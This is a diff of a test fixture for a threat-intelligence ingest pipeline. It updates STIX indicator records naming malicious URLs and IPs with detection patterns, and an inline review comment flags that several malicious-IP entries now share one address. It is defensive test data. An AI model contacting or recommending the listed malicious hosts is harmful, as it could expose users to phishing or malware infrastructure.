@@ -7621,7 +7621,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385770591Z", + "ingested": "2021-12-13T08:38:40.023420900Z", "original": "{\"created\":\"2020-01-27T02:55:30.343Z\",\"description\":\"TS ID: 55259870654; iType: mal_url; State: active; Org: Lir Ukraine LLC; Source: CyberCrime\",\"id\":\"indicator--4b567c10-4d32-40e4-87fd-b4654de5bf6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-27T02:55:30.343Z\",\"name\":\"mal_url: http://stcubegames.netxi.in/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stcubegames.netxi.in/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.343Z\"}", "category": "threat", "type": "indicator", @@ -7672,7 +7672,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385775049Z", + "ingested": "2021-12-13T08:38:40.023424400Z", "original": "{\"created\":\"2020-01-27T02:55:34.56Z\",\"description\":\"TS ID: 55259870763; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ab82b31f-02c9-4d98-b49f-21ab18a48b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-27T02:55:34.56Z\",\"name\":\"mal_url: http://dufre3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.56Z\"}", "category": "threat", "type": "indicator", 
@@ -7723,7 +7723,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385779728Z", + "ingested": "2021-12-13T08:38:40.023427900Z", "original": "{\"created\":\"2020-01-27T02:55:34.609Z\",\"description\":\"TS ID: 55259870730; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--47a1bc0c-5444-4c92-a0f8-a51655dd84e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:34.609Z\",\"name\":\"mal_url: http://merop12.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merop12.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.609Z\"}", "category": "threat", "type": "indicator", @@ -7774,7 +7774,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385784457Z", + "ingested": "2021-12-13T08:38:40.023431700Z", "original": "{\"created\":\"2020-01-27T02:55:36.798Z\",\"description\":\"TS ID: 55259870681; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e3ee6b9d-f8cd-42fa-8f51-bb0d54446734\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:36.798Z\",\"name\":\"mal_url: http://ramesvet.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:36.798Z\"}", "category": "threat", "type": "indicator", 
@@ -7825,7 +7825,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385788775Z", + "ingested": "2021-12-13T08:38:40.023435800Z", "original": "{\"created\":\"2020-01-27T02:55:38.721Z\",\"description\":\"TS ID: 55259870761; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ce0e3226-1587-4fd1-bdd0-aa76c548e8df\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:38.721Z\",\"name\":\"mal_url: http://dufres.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufres.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:38.721Z\"}", "category": "threat", "type": "indicator", @@ -7876,7 +7876,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385792832Z", + "ingested": "2021-12-13T08:38:40.023440900Z", "original": "{\"created\":\"2020-01-27T02:55:45.512Z\",\"description\":\"TS ID: 55259870706; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9c90ff74-a454-49c7-afa8-1339915ceac8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:45.512Z\",\"name\":\"mal_url: http://mogut3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:45.512Z\"}", "category": "threat", "type": "indicator", 
@@ -7927,7 +7927,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385797281Z", + "ingested": "2021-12-13T08:38:40.023445300Z", "original": "{\"created\":\"2020-01-27T02:55:48.012Z\",\"description\":\"TS ID: 55259870655; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--15806179-df3f-450a-baf5-8e2a29d87faa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-27T02:55:48.012Z\",\"name\":\"mal_url: http://vidar321.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vidar321.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:48.012Z\"}", "category": "threat", "type": "indicator", @@ -7946,7 +7946,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://91.90.192.161/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime", "modified": "2020-01-27T02:55:50.673Z", "valid_from": "2020-01-27T02:55:50.673Z", 
@@ -7970,16 +7970,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://91.90.192.161/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "91.90.192.161", - "full": "http://91.90.192.161/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385801609Z", - "original": "{\"created\":\"2020-01-27T02:55:50.673Z\",\"description\":\"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:50.673Z\",\"name\":\"mal_url: http://91.90.192.161/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://91.90.192.161/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:50.673Z\"}", + "ingested": "2021-12-13T08:38:40.023474600Z", + "original": "{\"created\":\"2020-01-27T02:55:50.673Z\",\"description\":\"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:50.673Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:50.673Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7997,7 +7997,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://95.181.178.210/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime", "modified": "2020-01-27T02:56:02.067Z", "valid_from": "2020-01-27T02:56:02.067Z", 
@@ -8021,16 +8021,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://95.181.178.210/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "95.181.178.210", - "full": "http://95.181.178.210/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385806127Z", - "original": "{\"created\":\"2020-01-27T02:56:02.067Z\",\"description\":\"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime\",\"id\":\"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-01-27T02:56:02.067Z\",\"name\":\"mal_url: http://95.181.178.210/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://95.181.178.210/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:02.067Z\"}", + "ingested": "2021-12-13T08:38:40.023479800Z", + "original": "{\"created\":\"2020-01-27T02:56:02.067Z\",\"description\":\"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime\",\"id\":\"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-01-27T02:56:02.067Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:02.067Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -8080,7 +8080,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385810776Z", + "ingested": "2021-12-13T08:38:40.023485700Z", "original": "{\"created\":\"2020-01-27T02:56:03.948Z\",\"description\":\"TS ID: 55259870672; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ee8c37a6-cb8b-478c-b527-2506637ceb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:03.948Z\",\"name\":\"mal_url: http://turams.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turams.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:03.948Z\"}", "category": "threat", "type": "indicator", @@ -8131,7 +8131,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385816116Z", + "ingested": "2021-12-13T08:38:40.023491300Z", "original": "{\"created\":\"2020-01-27T02:56:05.787Z\",\"description\":\"TS ID: 55259870662; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fd1feff8-dcc5-429a-953d-0bb80951bf5c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:05.787Z\",\"name\":\"mal_url: http://turames8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:05.787Z\"}", "category": "threat", "type": "indicator", 
@@ -8182,7 +8182,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385820484Z", + "ingested": "2021-12-13T08:38:40.023498100Z", "original": "{\"created\":\"2020-01-27T02:56:17.615Z\",\"description\":\"TS ID: 55259870820; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--f69535bc-4059-445d-90b0-1df8498137a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:17.615Z\",\"name\":\"mal_url: http://2maga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2maga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.615Z\"}", "category": "threat", "type": "indicator", @@ -8233,7 +8233,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385825273Z", + "ingested": "2021-12-13T08:38:40.023503900Z", "original": "{\"created\":\"2020-01-27T02:56:17.653Z\",\"description\":\"TS ID: 55259870704; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a372cefa-0694-4e39-aa50-67be2cded923\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:17.653Z\",\"name\":\"mal_url: http://mogutse.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogutse.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.653Z\"}", "category": "threat", "type": "indicator", 
@@ -8284,7 +8284,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385829391Z", + "ingested": "2021-12-13T08:38:40.023507500Z", "original": "{\"created\":\"2020-01-27T02:56:22.845Z\",\"description\":\"TS ID: 55259870661; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff74ddcd-b63b-4c1d-b4e0-8703b74564ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:22.845Z\",\"name\":\"mal_url: http://turamesplus.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesplus.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:22.845Z\"}", "category": "threat", "type": "indicator", @@ -8335,7 +8335,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385834100Z", + "ingested": "2021-12-13T08:38:40.023511200Z", "original": "{\"created\":\"2020-01-27T02:56:23.51Z\",\"description\":\"TS ID: 55259870713; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--360f60db-e8ca-4ede-9f65-7dcb01425d2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.51Z\",\"name\":\"mal_url: http://merops.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merops.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.51Z\"}", "category": "threat", "type": "indicator", 
@@ -8386,7 +8386,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385838438Z", + "ingested": "2021-12-13T08:38:40.023514900Z", "original": "{\"created\":\"2020-01-27T02:56:23.555Z\",\"description\":\"TS ID: 55259870702; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bafd8878-321e-4501-ae0f-221772acccae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.555Z\",\"name\":\"mal_url: http://mogut.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.555Z\"}", "category": "threat", "type": "indicator", @@ -8437,7 +8437,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385843087Z", + "ingested": "2021-12-13T08:38:40.023520300Z", "original": "{\"created\":\"2020-01-27T02:56:32.951Z\",\"description\":\"TS ID: 55259870813; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--21811787-57db-4ca6-abb9-57d33500a88e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:32.951Z\",\"name\":\"mal_url: http://2magas.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2magas.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:32.951Z\"}", "category": "threat", "type": "indicator", 
@@ -8488,7 +8488,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385847615Z", + "ingested": "2021-12-13T08:38:40.023527800Z", "original": "{\"created\":\"2020-01-27T02:56:37.65Z\",\"description\":\"TS ID: 55259870741; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--80641a7e-afbf-4b8d-96e6-4770491297b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-27T02:56:37.65Z\",\"name\":\"mal_url: http://merakim.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merakim.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.65Z\"}", "category": "threat", "type": "indicator", @@ -8539,7 +8539,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385851953Z", + "ingested": "2021-12-13T08:38:40.023531700Z", "original": "{\"created\":\"2020-01-27T02:56:37.697Z\",\"description\":\"TS ID: 55259870659; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fb351f4a-90ab-4ff4-a482-b38e7f92bb77\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:37.697Z\",\"name\":\"mal_url: http://turamesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.697Z\"}", "category": "threat", "type": "indicator", 
@@ -8590,7 +8590,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385856231Z", + "ingested": "2021-12-13T08:38:40.023537800Z", "original": "{\"created\":\"2020-01-27T02:56:41.827Z\",\"description\":\"TS ID: 55259870687; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a5ade447-681b-4518-8ea5-779d9de3ff0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:41.827Z\",\"name\":\"mal_url: http://ramesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.827Z\"}", "category": "threat", "type": "indicator", @@ -8641,7 +8641,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385860469Z", + "ingested": "2021-12-13T08:38:40.023543600Z", "original": "{\"created\":\"2020-01-27T02:56:41.874Z\",\"description\":\"TS ID: 55259870674; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9a797de6-1aa1-4f5c-b40a-c65699117f57\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-27T02:56:41.874Z\",\"name\":\"mal_url: http://roninrol.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://roninrol.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.874Z\"}", "category": "threat", "type": "indicator", 
@@ -8692,7 +8692,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385864878Z", + "ingested": "2021-12-13T08:38:40.023547800Z", "original": "{\"created\":\"2020-01-27T02:56:49.344Z\",\"description\":\"TS ID: 55259870678; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--7a094f4c-d57d-4bad-9258-a19210782331\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:49.344Z\",\"name\":\"mal_url: http://ramesvet8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:49.344Z\"}", "category": "threat", "type": "indicator", @@ -8743,7 +8743,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385869026Z", + "ingested": "2021-12-13T08:38:40.023552200Z", "original": "{\"created\":\"2020-01-27T02:56:53.905Z\",\"description\":\"TS ID: 55259870709; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--6de4e500-4c56-4288-aa8f-b092f194ff78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:53.905Z\",\"name\":\"mal_url: http://meropsi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropsi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:53.905Z\"}", "category": "threat", "type": "indicator", @@ -8762,7 +8762,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.90.192.161", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime", "modified": "2020-01-27T02:57:06.376Z", "valid_from": "2020-01-27T02:57:06.376Z", 
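Review bot: Starting with `@@ -8762` here, and again at `@@ -9321`, `@@ -9624`, `@@ -9720` and `@@ -10076`, five previously distinct mal_ip indicators now all carry `89.160.20.156`, so the fixture no longer distinguishes these documents by `threat.indicator.ip`. A pipeline regression that emitted a stale or constant IP across documents would therefore pass this expected file unnoticed. If the supported test subset contains more than one public address, spreading the mal_ip fixtures across them restores that coverage; if it does not, a one-line mention in the PR description that the collision is intentional would help the next maintainer.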
@@ -8784,12 +8784,12 @@ "first_seen": "2020-01-27T02:57:06.376Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.90.192.161" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385873243Z", - "original": "{\"created\":\"2020-01-27T02:57:06.376Z\",\"description\":\"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:06.376Z\",\"name\":\"mal_ip: 91.90.192.161\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.90.192.161']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:06.376Z\"}", + "ingested": "2021-12-13T08:38:40.023558100Z", + "original": "{\"created\":\"2020-01-27T02:57:06.376Z\",\"description\":\"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:06.376Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:06.376Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -8839,7 +8839,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385877531Z", + "ingested": "2021-12-13T08:38:40.023562200Z", "original": "{\"created\":\"2020-01-27T02:57:09.474Z\",\"description\":\"TS ID: 55259870721; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0e9df710-3a24-4070-9576-f3081708cd67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:09.474Z\",\"name\":\"mal_url: http://meropa.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropa.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:09.474Z\"}", "category": "threat", "type": "indicator", @@ -8890,7 +8890,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385882110Z", + "ingested": "2021-12-13T08:38:40.023567300Z", "original": "{\"created\":\"2020-01-27T02:57:12.314Z\",\"description\":\"TS ID: 55259870801; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--4d6b9fe5-43f3-42af-b7c0-171052280208\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:12.314Z\",\"name\":\"mal_url: http://5umaga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5umaga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.314Z\"}", "category": "threat", "type": "indicator", 
@@ -8941,7 +8941,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385886488Z", + "ingested": "2021-12-13T08:38:40.023574900Z", "original": "{\"created\":\"2020-01-27T02:57:12.344Z\",\"description\":\"TS ID: 55259870773; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--50a15dd9-290b-4240-9245-bbe259bcc4c7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:12.344Z\",\"name\":\"mal_url: http://dufre1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.344Z\"}", "category": "threat", "type": "indicator", @@ -8992,7 +8992,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385890877Z", + "ingested": "2021-12-13T08:38:40.023585Z", "original": "{\"created\":\"2020-01-27T02:57:17.92Z\",\"description\":\"TS ID: 55259870746; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--53b80678-1eeb-433c-bd54-fd1ae9c83c18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-27T02:57:17.92Z\",\"name\":\"mal_url: http://dufre-tom.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre-tom.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:17.92Z\"}", "category": "threat", "type": "indicator", 
@@ -9043,7 +9043,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385895335Z", + "ingested": "2021-12-13T08:38:40.023592900Z", "original": "{\"created\":\"2020-01-27T02:57:19.085Z\",\"description\":\"TS ID: 55259870735; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b14f43dd-6653-42d4-b0db-3cf4e7fbee87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:19.085Z\",\"name\":\"mal_url: http://meropi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:19.085Z\"}", "category": "threat", "type": "indicator", @@ -9095,7 +9095,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385899643Z", + "ingested": "2021-12-13T08:38:40.023596600Z", "original": "{\"created\":\"2020-01-28T02:58:19.372Z\",\"description\":\"TS ID: 55263242048; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: 